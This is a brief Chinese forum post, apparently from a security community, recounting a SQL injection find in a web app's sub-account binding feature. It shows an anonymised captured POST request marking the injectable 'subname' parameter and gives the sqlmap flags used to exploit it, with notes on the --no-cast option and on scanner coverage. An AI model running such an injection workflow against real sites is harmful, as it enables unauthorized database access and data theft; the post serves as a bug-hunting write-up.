RANK 80
金币 100
数据包
POST xxxx/sendapp HTTP/1.1
Host: aaa.bbb.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Referer: XXXX
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 21
Cookie: XXXXX
DNT: 1
Connection: close
subname=admin*&group=1
参数subname可注入,直接将数据包存为txt ,-r ,--no-cast --threads=10就好了
用了很久的no-cast,还没有细查过什么意思。有一句解释是这样的:
默认情况下,sqlmap榨取数据时会将所有结果转换为字符串,并用空格替换NULL结果
老版本mysql数据库对此提取不到数据,因而需要该参数取消这个默认处理方式
注入点,还是在于扫描器爬虫的深度和广度、模拟登录载入cookie、token等
后来查看了一下,原来位置是在 账号管理功能模块的绑定账号,即A账号绑定子账号B,B的名字可注入。这个点,确实一般的扫描器会扫么是个问题。挖洞还是在于去钻吧。